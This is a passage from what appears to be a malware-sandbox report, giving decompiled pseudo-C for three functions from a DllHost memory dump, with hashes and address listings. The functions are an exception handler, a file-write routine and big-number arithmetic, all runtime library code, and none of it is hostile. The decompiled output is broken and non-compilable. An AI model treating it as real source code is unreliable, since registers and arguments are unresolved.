                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3140674995-0
                                                                                                                                                              • Opcode ID: 7442d96ed8be6e406ddb8735d64eb84307debff0f78059eaa60e81e56549abec
                                                                                                                                                              • Instruction ID: 8d3c083716bb54f79e89ba5d2b7fc2d0e35493e82a8fd4dead155dbf3adb6073
                                                                                                                                                              • Opcode Fuzzy Hash: 7442d96ed8be6e406ddb8735d64eb84307debff0f78059eaa60e81e56549abec
                                                                                                                                                              • Instruction Fuzzy Hash: 1A313E72608E8185FB64AF60E4443EDB375F744758F844439D64E47A98EF38D58ED720
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191DA3C4 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 65%
                                                                                                                                                              			E00007FF77FF7191DA3C4(void* __ecx, intOrPtr __edx, long long __rbx, void* __rdx, long long __rsi, void* __r8) {
				void* _t36;
				void* _t37;
				void* _t38;
				int _t40;
				signed long long _t62;
				long long _t65;
				_Unknown_base(*)()* _t85;
				void* _t89;
				void* _t90;
				void* _t92;
				signed long long _t93;
				struct _EXCEPTION_POINTERS* _t99;

				 *((long long*)(_t92 + 0x10)) = __rbx;
				 *((long long*)(_t92 + 0x18)) = __rsi;
				_t90 = _t92 - 0x4f0;
				_t93 = _t92 - 0x5f0;
				_t62 =  *0x192190a0; // 0x590452ce5669
				 *(_t90 + 0x4e0) = _t62 ^ _t93;
				if (__ecx == 0xffffffff) goto 0x191da403;
				_t37 = E00007FF77FF7191D2F50(_t36);
				r8d = 0x98;
				_t38 = E00007FF77FF7191D4A30(_t37, 0, _t93 + 0x70, __rdx, __r8);
				r8d = 0x4d0;
				E00007FF77FF7191D4A30(_t38, 0, _t90 + 0x10, __rdx, __r8);
				 *((long long*)(_t93 + 0x48)) = _t93 + 0x70;
				_t65 = _t90 + 0x10;
				 *((long long*)(_t93 + 0x50)) = _t65;
				__imp__RtlCaptureContext();
				r8d = 0;
				__imp__RtlLookupFunctionEntry();
				if (_t65 == 0) goto 0x191da496;
				 *(_t93 + 0x38) =  *(_t93 + 0x38) & 0x00000000;
				 *((long long*)(_t93 + 0x30)) = _t93 + 0x58;
				 *((long long*)(_t93 + 0x28)) = _t93 + 0x60;
				 *((long long*)(_t93 + 0x20)) = _t90 + 0x10;
				__imp__RtlVirtualUnwind();
				 *((long long*)(_t90 + 0x108)) =  *((intOrPtr*)(_t90 + 0x508));
				 *((intOrPtr*)(_t93 + 0x70)) = __edx;
				 *((long long*)(_t90 + 0xa8)) = _t90 + 0x510;
				 *((long long*)(_t90 - 0x80)) =  *((intOrPtr*)(_t90 + 0x508));
				 *((intOrPtr*)(_t93 + 0x74)) = r8d;
				_t40 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(_t85, _t89);
				if (UnhandledExceptionFilter(_t99) != 0) goto 0x191da4f8;
				if (_t40 != 0) goto 0x191da4f8;
				if (__ecx == 0xffffffff) goto 0x191da4f8;
				return E00007FF77FF7191D23B0(E00007FF77FF7191D2F50(_t42), __ecx,  *(_t90 + 0x4e0) ^ _t93);
			}















                                                                                                                                                              0x7ff7191da3c4
                                                                                                                                                              0x7ff7191da3c9
                                                                                                                                                              0x7ff7191da3d2
                                                                                                                                                              0x7ff7191da3da
                                                                                                                                                              0x7ff7191da3e1
                                                                                                                                                              0x7ff7191da3eb
                                                                                                                                                              0x7ff7191da3fc
                                                                                                                                                              0x7ff7191da3fe
                                                                                                                                                              0x7ff7191da40a
                                                                                                                                                              0x7ff7191da410
                                                                                                                                                              0x7ff7191da41b
                                                                                                                                                              0x7ff7191da421
                                                                                                                                                              0x7ff7191da42b
                                                                                                                                                              0x7ff7191da434
                                                                                                                                                              0x7ff7191da438
                                                                                                                                                              0x7ff7191da43d
                                                                                                                                                              0x7ff7191da452
                                                                                                                                                              0x7ff7191da455
                                                                                                                                                              0x7ff7191da45e
                                                                                                                                                              0x7ff7191da460
                                                                                                                                                              0x7ff7191da473
                                                                                                                                                              0x7ff7191da480
                                                                                                                                                              0x7ff7191da489
                                                                                                                                                              0x7ff7191da490
                                                                                                                                                              0x7ff7191da49d
                                                                                                                                                              0x7ff7191da4af
                                                                                                                                                              0x7ff7191da4b3
                                                                                                                                                              0x7ff7191da4c1
                                                                                                                                                              0x7ff7191da4c5
                                                                                                                                                              0x7ff7191da4c9
                                                                                                                                                              0x7ff7191da4d3
                                                                                                                                                              0x7ff7191da4e6
                                                                                                                                                              0x7ff7191da4ea
                                                                                                                                                              0x7ff7191da4ef
                                                                                                                                                              0x7ff7191da51e

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1239891234-0
                                                                                                                                                              • Opcode ID: 985d6daf95c8e6d1304e5a2ffc06a2274602506931b258a2808260a2f371a414
                                                                                                                                                              • Instruction ID: e761f4d6b52dc4e166ceee3c4123eda977207abeb9b601c05d12de5d86e41410
                                                                                                                                                              • Opcode Fuzzy Hash: 985d6daf95c8e6d1304e5a2ffc06a2274602506931b258a2808260a2f371a414
                                                                                                                                                              • Instruction Fuzzy Hash: B8315432618F8185EB64DF25F8442ADB3B4FB88768F940135EA5D47B98DF38D19ACB10
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191E5EF4 Relevance: 7.8, APIs: 5, Instructions: 325fileCOMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 72%
                                                                                                                                                              			E00007FF77FF7191E5EF4(void* __eax, signed int __edx, void* __esi, void* __eflags, long long __rbx, long long __rcx, void* __rdx, long long __r8, void* __r10) {
				void* __rsi;
				void* __rbp;
				char _t160;
				char _t167;
				void* _t171;
				intOrPtr _t172;
				int _t173;
				int _t175;
				intOrPtr _t181;
				long long _t187;
				signed char _t188;
				intOrPtr _t196;
				signed long long _t238;
				signed long long _t244;
				long long _t247;
				long long _t248;
				long long _t249;
				long long _t257;
				intOrPtr _t263;
				signed long long _t271;
				long long _t284;
				intOrPtr _t288;
				void* _t289;
				long _t293;
				void* _t296;
				char _t299;
				void* _t301;
				DWORD* _t305;
				void* _t307;
				struct _OVERLAPPED* _t310;
				void* _t311;
				void* _t313;
				signed long long _t314;
				long long _t316;
				void* _t324;
				intOrPtr _t325;
				long long _t332;
				void* _t334;
				signed long long _t336;
				void* _t338;
				long long _t339;
				intOrPtr _t340;
				void* _t342;
				signed long long _t343;
				long long _t345;
				long long _t347;

				_t316 = __r8;
				 *((long long*)(_t313 + 8)) = __rbx;
				_t311 = _t313 - 0x27;
				_t314 = _t313 - 0x100;
				_t238 =  *0x192190a0; // 0x590452ce5669
				 *(_t311 + 0x1f) = _t238 ^ _t314;
				_t257 = __edx;
				 *((long long*)(_t311 - 1)) = __rcx;
				r13d = r9d;
				 *((long long*)(_t311 - 0x19)) = __r8;
				_t339 = _t338 + __r8;
				 *((long long*)(_t311 - 9)) = __edx;
				 *((long long*)(_t311 - 0x49)) = _t339;
				_t343 = __edx + __edx * 8;
				_t336 = __edx >> 6;
				 *((long long*)(_t311 - 0x41)) =  *((intOrPtr*)( *((intOrPtr*)(0x7ff7191b0000 + 0x6b700 + _t336 * 8)) + 0x28 + _t343 * 8));
				 *((intOrPtr*)(_t311 - 0x59)) = GetConsoleCP();
				E00007FF77FF7191D86F4( *((intOrPtr*)( *((intOrPtr*)(0x7ff7191b0000 + 0x6b700 + _t336 * 8)) + 0x28 + _t343 * 8)), __edx, _t314 + 0x50, __rdx, _t305, _t345);
				_t263 =  *((intOrPtr*)(_t314 + 0x58));
				r15d = 0;
				r10d = 0;
				 *((long long*)(_t311 - 0x51)) = _t345;
				 *((long long*)(_t311 - 0x69)) = _t345;
				_t196 =  *((intOrPtr*)(_t263 + 0xc));
				 *((intOrPtr*)(_t311 - 0x55)) = _t196;
				if (__r8 - _t339 >= 0) goto 0x191e62d7;
				_t244 = __edx >> 6;
				 *(_t311 - 0x11) = _t244;
				r8d = 0;
				 *((char*)(_t314 + 0x40)) =  *((intOrPtr*)(__r8));
				 *((intOrPtr*)(_t314 + 0x44)) = r8d;
				_t29 = _t316 + 1; // 0x1
				r15d = _t29;
				if (_t196 != 0xfde9) goto 0x191e614b;
				_t325 =  *((intOrPtr*)(0x7ff7191b0000 + 0x6b700 + _t244 * 8));
				if ( *((intOrPtr*)(_t325 + _t343 * 8 + __r10 + 0x3e)) == r10b) goto 0x191e5ff4;
				_t296 = __r10 + 1;
				if (_t296 - 5 < 0) goto 0x191e5fe2;
				if (_t296 <= 0) goto 0x191e60ec;
				r15d =  *((char*)(_t263 + 0x7ff719219490));
				r15d = r15d + 1;
				r13d = r15d;
				r13d = r13d - r10d + 1;
				if (r13d -  *((intOrPtr*)(_t311 - 0x49)) - __r8 > 0) goto 0x191e629c;
				if (_t296 <= 0) goto 0x191e605c;
				_t247 = _t311 + 7;
				_t332 = _t325 - _t247 + _t343 * 8;
				 *((char*)(_t311 + 7 + __r10)) =  *((intOrPtr*)(_t311 + 7 + __r10 + _t332 + 0x3e));
				if (__r10 + 1 - _t296 < 0) goto 0x191e6043;
				r10d = 0;
				if (r13d <= 0) goto 0x191e6076;
				E00007FF77FF7191D4380();
				r10d = 0;
				_t284 = _t332;
				if (_t296 <= 0) goto 0x191e609d;
				 *((intOrPtr*)( *((intOrPtr*)(0x7ff7191b0000 + 0x6b700 + _t336 * 8)) + _t284 + 0x3e + _t343 * 8)) = r10b;
				if (_t284 + 1 - _t296 < 0) goto 0x191e6085;
				 *((long long*)(_t311 - 0x39)) = _t247;
				_t248 = _t311 + 7;
				 *((long long*)(_t311 - 0x31)) = _t248;
				_t160 = (r10d & 0xffffff00 | r15d == 0x00000004) + 1;
				r8d = _t160;
				r15d = _t160;
				E00007FF77FF7191F1D60(_t248, __edx, _t314 + 0x44, _t311 - 0x31, 0x7ff7191b0000, _t311 - 0x39);
				if (_t248 == 0xffffffff) goto 0x191e63b4;
				_t340 =  *((intOrPtr*)(_t311 - 0x49));
				goto 0x191e61c0;
				_t299 =  *((char*)(_t248 + 0x7ff719219490));
				_t187 = _t299 + 1;
				_t249 = _t187;
				if (_t249 - _t340 - __r8 > 0) goto 0x191e6324;
				 *((long long*)(_t311 - 0x21)) = __r8;
				 *((long long*)(_t311 - 0x29)) = _t249;
				_t271 = _t314 + 0x44;
				_t167 = (r10d & 0xffffff00 | _t187 == 0x00000004) + 1;
				r8d = _t167;
				E00007FF77FF7191F1D60(_t249, __edx, _t271, _t311 - 0x21, _t340 - __r8, _t311 - 0x29);
				if (_t249 == 0xffffffff) goto 0x191e63b4;
				r15d = _t167;
				goto 0x191e61c0;
				_t288 =  *((intOrPtr*)(0x7ff7191b0000 + 0x6b700 + _t336 * 8));
				_t188 =  *(_t288 + 0x3d + _t343 * 8);
				if ((_t188 & 0x00000004) == 0) goto 0x191e6185;
				 *((char*)(_t311 + 0xf)) =  *((intOrPtr*)(_t288 + 0x3e + _t343 * 8));
				r8d = 2;
				 *(_t288 + 0x3d + _t343 * 8) = _t188 & 0x000000fb;
				_t289 = _t311 + 0xf;
				 *((char*)(_t311 + 0x10)) =  *((intOrPtr*)(__r8));
				goto 0x191e61ad;
				_t171 = E00007FF77FF7191DE4F0(0x7ff7191b0000);
				if ( *((intOrPtr*)(0x7ff7191b0000 + _t271 * 2)) >= 0) goto 0x191e61a7;
				_t301 = _t299 + __r8 + 1;
				if (_t301 - _t340 >= 0) goto 0x191e637a;
				_t101 = _t289 + 2; // 0x2
				r8d = _t101;
				goto 0x191e61aa;
				_t172 = E00007FF77FF7191E7590(_t171, _t314 + 0x44, __r8);
				if (_t172 == 0xffffffff) goto 0x191e63b4;
				_t324 = _t314 + 0x44;
				 *((long long*)(_t314 + 0x38)) = _t257;
				_t307 = _t301 + 1;
				 *((long long*)(_t314 + 0x30)) = _t257;
				r9d = r15d;
				 *((intOrPtr*)(_t314 + 0x28)) = 5;
				 *((long long*)(_t314 + 0x20)) = _t311 + 0x17;
				E00007FF77FF7191EB214(_t342);
				if (_t172 == 0) goto 0x191e63c6;
				r8d = _t172;
				 *((long long*)(_t314 + 0x20)) = _t257;
				_t173 = WriteFile(_t338, _t334, _t293, _t305, _t310);
				r10d = 0;
				if (_t173 == 0) goto 0x191e63bd;
				_t347 =  *((intOrPtr*)(_t311 - 0x51));
				_t181 =  *((intOrPtr*)(_t311 - 0x41)) + _t347;
				 *((intOrPtr*)(_t311 - 0x65)) = _t181;
				if ( *((intOrPtr*)(_t314 + 0x48)) - _t172 < 0) goto 0x191e62d7;
				if ( *((char*)(_t314 + 0x40)) != 0xa) goto 0x191e6288;
				_t122 = _t332 + 0xd; // 0xd
				 *((short*)(_t314 + 0x40)) = _t122;
				_t125 = _t332 + 1; // 0x1
				r8d = _t125;
				 *((long long*)(_t314 + 0x20)) = _t332;
				_t175 = WriteFile(??, ??, ??, ??, ??);
				r10d = 0;
				if (_t175 == 0) goto 0x191e63ab;
				if ( *((intOrPtr*)(_t314 + 0x48)) - 1 < 0) goto 0x191e62d7;
				r15d = r15d + 1;
				 *((long long*)(_t311 - 0x51)) = _t347;
				 *((intOrPtr*)(_t311 - 0x65)) = _t181 + 1;
				_t302 = _t307;
				if (_t307 - _t340 >= 0) goto 0x191e62d7;
				goto 0x191e5fab;
				if (_t324 <= 0) goto 0x191e62d1;
				 *((char*)( *((intOrPtr*)(0x7ff7191b0000 + 0x6b700 + _t336 * 8)) + _t302 + 0x3e + _t343 * 8)) =  *((intOrPtr*)(_t307 - _t307 + _t307));
				if (r10d + 1 - _t324 < 0) goto 0x191e62ae;
				 *((intOrPtr*)(_t311 - 0x65)) =  *((intOrPtr*)(_t311 - 0x65)) + r8d;
				if ( *((intOrPtr*)(_t311 - 0x71)) == r10b) goto 0x191e62e9;
				 *( *((intOrPtr*)(_t314 + 0x50)) + 0x3a8) =  *( *((intOrPtr*)(_t314 + 0x50)) + 0x3a8) & 0xfffffffd;
				asm("movsd xmm0, [ebp-0x69]");
				asm("movsd [eax], xmm0");
				 *((intOrPtr*)( *((intOrPtr*)(_t311 - 1)) + 8)) = __esi -  *((intOrPtr*)(_t311 - 0x19));
				return E00007FF77FF7191D23B0( *((intOrPtr*)(_t307 - _t307 + _t307)), __esi -  *((intOrPtr*)(_t311 - 0x19)),  *(_t311 + 0x1f) ^ _t314);
			}

















































                                                                                                                                                              0x7ff7191e5ef4
                                                                                                                                                              0x7ff7191e5ef4
                                                                                                                                                              0x7ff7191e5f04
                                                                                                                                                              0x7ff7191e5f09
                                                                                                                                                              0x7ff7191e5f10
                                                                                                                                                              0x7ff7191e5f1a
                                                                                                                                                              0x7ff7191e5f1e
                                                                                                                                                              0x7ff7191e5f27
                                                                                                                                                              0x7ff7191e5f2e
                                                                                                                                                              0x7ff7191e5f38
                                                                                                                                                              0x7ff7191e5f3c
                                                                                                                                                              0x7ff7191e5f3f
                                                                                                                                                              0x7ff7191e5f46
                                                                                                                                                              0x7ff7191e5f4a
                                                                                                                                                              0x7ff7191e5f4e
                                                                                                                                                              0x7ff7191e5f5f
                                                                                                                                                              0x7ff7191e5f70
                                                                                                                                                              0x7ff7191e5f73
                                                                                                                                                              0x7ff7191e5f78
                                                                                                                                                              0x7ff7191e5f7d
                                                                                                                                                              0x7ff7191e5f80
                                                                                                                                                              0x7ff7191e5f83
                                                                                                                                                              0x7ff7191e5f87
                                                                                                                                                              0x7ff7191e5f8e
                                                                                                                                                              0x7ff7191e5f91
                                                                                                                                                              0x7ff7191e5f97
                                                                                                                                                              0x7ff7191e5fa3
                                                                                                                                                              0x7ff7191e5fa7
                                                                                                                                                              0x7ff7191e5fad
                                                                                                                                                              0x7ff7191e5fb0
                                                                                                                                                              0x7ff7191e5fb4
                                                                                                                                                              0x7ff7191e5fb9
                                                                                                                                                              0x7ff7191e5fb9
                                                                                                                                                              0x7ff7191e5fc3
                                                                                                                                                              0x7ff7191e5fd3
                                                                                                                                                              0x7ff7191e5fe7
                                                                                                                                                              0x7ff7191e5feb
                                                                                                                                                              0x7ff7191e5ff2
                                                                                                                                                              0x7ff7191e5ff7
                                                                                                                                                              0x7ff7191e6012
                                                                                                                                                              0x7ff7191e601b
                                                                                                                                                              0x7ff7191e601e
                                                                                                                                                              0x7ff7191e6021
                                                                                                                                                              0x7ff7191e602a
                                                                                                                                                              0x7ff7191e6036
                                                                                                                                                              0x7ff7191e6038
                                                                                                                                                              0x7ff7191e603f
                                                                                                                                                              0x7ff7191e6052
                                                                                                                                                              0x7ff7191e6057
                                                                                                                                                              0x7ff7191e6059
                                                                                                                                                              0x7ff7191e605f
                                                                                                                                                              0x7ff7191e606e
                                                                                                                                                              0x7ff7191e6073
                                                                                                                                                              0x7ff7191e6076
                                                                                                                                                              0x7ff7191e607c
                                                                                                                                                              0x7ff7191e6093
                                                                                                                                                              0x7ff7191e609b
                                                                                                                                                              0x7ff7191e60a3
                                                                                                                                                              0x7ff7191e60ab
                                                                                                                                                              0x7ff7191e60b3
                                                                                                                                                              0x7ff7191e60c2
                                                                                                                                                              0x7ff7191e60c4
                                                                                                                                                              0x7ff7191e60c7
                                                                                                                                                              0x7ff7191e60ca
                                                                                                                                                              0x7ff7191e60d3
                                                                                                                                                              0x7ff7191e60dd
                                                                                                                                                              0x7ff7191e60e7
                                                                                                                                                              0x7ff7191e60f5
                                                                                                                                                              0x7ff7191e60fe
                                                                                                                                                              0x7ff7191e6101
                                                                                                                                                              0x7ff7191e6107
                                                                                                                                                              0x7ff7191e610f
                                                                                                                                                              0x7ff7191e6113
                                                                                                                                                              0x7ff7191e6125
                                                                                                                                                              0x7ff7191e612d
                                                                                                                                                              0x7ff7191e612f
                                                                                                                                                              0x7ff7191e6134
                                                                                                                                                              0x7ff7191e613d
                                                                                                                                                              0x7ff7191e6146
                                                                                                                                                              0x7ff7191e6149
                                                                                                                                                              0x7ff7191e6152
                                                                                                                                                              0x7ff7191e615a
                                                                                                                                                              0x7ff7191e6162
                                                                                                                                                              0x7ff7191e616c
                                                                                                                                                              0x7ff7191e616f
                                                                                                                                                              0x7ff7191e6177
                                                                                                                                                              0x7ff7191e617c
                                                                                                                                                              0x7ff7191e6180
                                                                                                                                                              0x7ff7191e6183
                                                                                                                                                              0x7ff7191e6185
                                                                                                                                                              0x7ff7191e6193
                                                                                                                                                              0x7ff7191e6195
                                                                                                                                                              0x7ff7191e619b
                                                                                                                                                              0x7ff7191e61a1
                                                                                                                                                              0x7ff7191e61a1
                                                                                                                                                              0x7ff7191e61a5
                                                                                                                                                              0x7ff7191e61b2
                                                                                                                                                              0x7ff7191e61ba
                                                                                                                                                              0x7ff7191e61c9
                                                                                                                                                              0x7ff7191e61ce
                                                                                                                                                              0x7ff7191e61d3
                                                                                                                                                              0x7ff7191e61d7
                                                                                                                                                              0x7ff7191e61dc
                                                                                                                                                              0x7ff7191e61df
                                                                                                                                                              0x7ff7191e61e9
                                                                                                                                                              0x7ff7191e61ee
                                                                                                                                                              0x7ff7191e61f7
                                                                                                                                                              0x7ff7191e6206
                                                                                                                                                              0x7ff7191e6209
                                                                                                                                                              0x7ff7191e6212
                                                                                                                                                              0x7ff7191e6218
                                                                                                                                                              0x7ff7191e621d
                                                                                                                                                              0x7ff7191e6223
                                                                                                                                                              0x7ff7191e622c
                                                                                                                                                              0x7ff7191e6230
                                                                                                                                                              0x7ff7191e6237
                                                                                                                                                              0x7ff7191e6242
                                                                                                                                                              0x7ff7191e6248
                                                                                                                                                              0x7ff7191e6251
                                                                                                                                                              0x7ff7191e6256
                                                                                                                                                              0x7ff7191e6256
                                                                                                                                                              0x7ff7191e625a
                                                                                                                                                              0x7ff7191e6264
                                                                                                                                                              0x7ff7191e626a
                                                                                                                                                              0x7ff7191e626f
                                                                                                                                                              0x7ff7191e627a
                                                                                                                                                              0x7ff7191e627c
                                                                                                                                                              0x7ff7191e6281
                                                                                                                                                              0x7ff7191e6285
                                                                                                                                                              0x7ff7191e6288
                                                                                                                                                              0x7ff7191e628e
                                                                                                                                                              0x7ff7191e6297
                                                                                                                                                              0x7ff7191e62a2
                                                                                                                                                              0x7ff7191e62c1
                                                                                                                                                              0x7ff7191e62cc
                                                                                                                                                              0x7ff7191e62d4
                                                                                                                                                              0x7ff7191e62db
                                                                                                                                                              0x7ff7191e62e2
                                                                                                                                                              0x7ff7191e62ed
                                                                                                                                                              0x7ff7191e62f6
                                                                                                                                                              0x7ff7191e62fa
                                                                                                                                                              0x7ff7191e6323

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorFileLastWrite$Console
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 786612050-0
                                                                                                                                                              • Opcode ID: f6dc7d823432f32f9789ffb5f1926235ddf946f8bc542e514b73e895fa3cb5bb
                                                                                                                                                              • Instruction ID: 34435f0c6db67a93785fc07151154acbfedf331382b1ac20ce605e8b5932d708
                                                                                                                                                              • Opcode Fuzzy Hash: f6dc7d823432f32f9789ffb5f1926235ddf946f8bc542e514b73e895fa3cb5bb
                                                                                                                                                              • Instruction Fuzzy Hash: B7E1EF72B08A868AF702DF64E4441EDB7B1FB447ECB940536CA4E57B89DE38D19AD310
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191DE760 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 317COMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 70%
                                                                                                                                                              			E00007FF77FF7191DE760(signed int __ecx, signed int __rax, signed int* __rcx, unsigned int __rdx, void* __r10, long long __r13, signed int _a8, long long _a16, signed char _a24, signed int _a32) {
				long long _v64;
				char _v532;
				signed int _v536;
				signed long long _v544;
				signed long long _v552;
				signed int _v556;
				signed int _v560;
				signed int _v568;
				void* __rbx;
				void* __rsi;
				void* _t124;
				signed int _t140;
				signed char _t161;
				signed char _t164;
				signed int _t173;
				signed char _t181;
				signed int _t185;
				signed int _t186;
				void* _t187;
				signed int _t190;
				signed int _t191;
				signed int _t208;
				void* _t225;
				signed long long _t236;
				signed int _t239;
				void* _t247;
				signed long long _t248;
				signed int* _t254;
				intOrPtr* _t261;
				signed long long _t266;
				signed long long _t268;
				signed long long _t270;
				signed long long _t272;
				void* _t273;
				void* _t276;
				signed long long _t278;
				char* _t284;
				signed int _t287;
				signed long long _t288;
				void* _t294;
				signed long long _t296;
				signed long long _t297;
				void* _t304;
				signed long long _t307;
				signed long long _t320;

				_a16 = __rdx;
				r10d =  *__rcx;
				if (r10d == 0) goto 0x191deb75;
				_t187 =  *__rdx;
				if (_t187 == 0) goto 0x191deb75;
				r10d = r10d - 1;
				if (_t273 - 1 != 0) goto 0x191de882;
				r12d =  *(__rdx + 4);
				if (r12d != 1) goto 0x191de7d2;
				_t254 =  &(__rcx[1]);
				 *__rcx = 0;
				r9d = 0;
				_v536 = 0;
				E00007FF77FF7191DEB8C(__rax, _t247, _t254, __rdx, __rcx,  &_v532, _t294);
				goto 0x191deb77;
				if (r10d != 0) goto 0x191de80d;
				 *_t254 = 0;
				r9d = 0;
				_v536 = 0;
				E00007FF77FF7191DEB8C(__rax, _t247,  &(_t254[1]), __rdx, __rcx,  &_v532, _t294);
				_t173 = _t254[1] % r12d;
				__rcx[1] = _t173;
				bpl = _t173 != 0;
				 *__rcx = 0;
				goto 0x191deb77;
				r15d = 0xffffffff;
				if (r10d == r15d) goto 0x191de846;
				r10d = r10d + r15d;
				_t276 = (_t278 << 0x20) + (__rax | _t278 << 0x00000020);
				if (r10d != r15d) goto 0x191de821;
				r9d = 0;
				_v536 = 0;
				_t284 =  &_v532;
				 *__rcx = 0;
				_t124 = E00007FF77FF7191DEB8C(__rax | _t278 << 0x00000020, _t247,  &(__rcx[1]), __rdx, __rcx, _t284, _t294);
				__rcx[1] = r14d;
				__rcx[2] = __ecx;
				bpl = __ecx != 0;
				 *__rcx = 1;
				goto 0x191deb77;
				if (_t124 - r10d > 0) goto 0x191deb75;
				r8d = r10d;
				_t268 = r10d;
				r8d = r8d - _t124;
				r9d = r10d;
				_t248 = r8d;
				if (_t268 - _t248 < 0) goto 0x191de8e8;
				_t307 = __rdx - _t248 * 4 - __rcx;
				_t261 = (__rdx >> 0x20) + 4 + _t268 * 4;
				if ( *((intOrPtr*)(_t307 + _t261)) !=  *_t261) goto 0x191de8d1;
				r9d = r9d - 1;
				if (_t268 - 1 - _t248 >= 0) goto 0x191de8b8;
				goto 0x191de8e8;
				_t270 = r9d - r8d;
				_t236 = r9d;
				if ( *((intOrPtr*)(__rdx + 4 + _t270 * 4)) -  *(__rcx + 4 + _t236 * 4) >= 0) goto 0x191de8eb;
				r8d = r8d + 1;
				_t208 = r8d;
				if (_t208 == 0) goto 0x191deb75;
				r9d =  *(__rdx + 4 + _t236 * 4);
				_t190 =  *(__rdx + 4 + _t236 * 4);
				asm("inc ecx");
				_a8 = _t190;
				if (_t208 == 0) goto 0x191de921;
				r11d = 0x1f;
				r11d = r11d - _t276 - 2;
				goto 0x191de924;
				r11d = 0x20;
				_a24 = r11d;
				_v568 = 0x20;
				if (r11d == 0) goto 0x191de96f;
				_t161 = r11d;
				r9d = _t190 >> 0x20;
				_t191 = _t190 << _t161;
				r9d = r9d | r9d << _t161;
				_a8 = _t191;
				if (_t187 - 2 <= 0) goto 0x191de96f;
				_a8 = _t191 |  *(__rdx + 4 + _t236 * 4) >> 0x00000020;
				r14d = _t284 - 1;
				r12d = 0;
				if (r14d < 0) goto 0x191deb40;
				r15d = 0xffffffff;
				_v64 = __r13;
				r13d = __rdx + _t276;
				_v544 = _t248;
				_v552 = _t236;
				if (r13d - r10d > 0) goto 0x191de9ae;
				goto 0x191de9b0;
				_a32 = 0;
				r11d =  *(__rcx + 4 + _t236 * 4);
				_v560 = _t261 - 4;
				_v556 = 0;
				_t181 = _a24;
				if (_t181 == 0) goto 0x191dea10;
				r8d = r11d;
				_t164 = _t181;
				r11d = r11d << _t164;
				if (r13d - 3 < 0) goto 0x191dea15;
				_t140 =  *(__rcx + 4 + (_v560 << _t164) * 4) >> _v568;
				r11d = r11d | _t140;
				goto 0x191dea15;
				_t287 = _v560;
				_t239 = _t287;
				r8d = _t140 % _t248;
				if (_t239 - _t320 <= 0) goto 0x191dea3f;
				_t296 = _t320;
				_t288 = _t287 + 0x1;
				if (_t288 - _t320 > 0) goto 0x191dea6e;
				_t266 = _t288 << 0x00000020 | _t307;
				if (0x1 - _t266 <= 0) goto 0x191dea6e;
				_t297 = _t296 - 1;
				if (_t288 + _t248 - _t320 <= 0) goto 0x191dea51;
				if (_t297 == 0) goto 0x191deb21;
				r11d = 0;
				if (_t187 == 0) goto 0x191deacf;
				r8d = r10d;
				_t304 =  >=  ? _t278 + 0x1 >> 0x20 : (_t278 + 0x1 >> 0x20) + 1;
				r11d = r11d + 1;
				 *((intOrPtr*)(__rcx + 4 + _t266 * 4)) = __rcx[0xffffffff00000002] - r8d;
				if (r11d - _t187 < 0) goto 0x191dea90;
				if (0x1 - _t304 >= 0) goto 0x191deb1d;
				r10d = 0;
				if (_t187 == 0) goto 0x191deb1a;
				r10d = r10d + 1;
				_t272 =  &(__rcx[0xffffffff00000001]);
				 *(_t272 + 4) = r8d;
				_t225 = r10d - _t187;
				if (_t225 < 0) goto 0x191deaf1;
				r10d = __r13 - 1;
				r13d = r13d - 1;
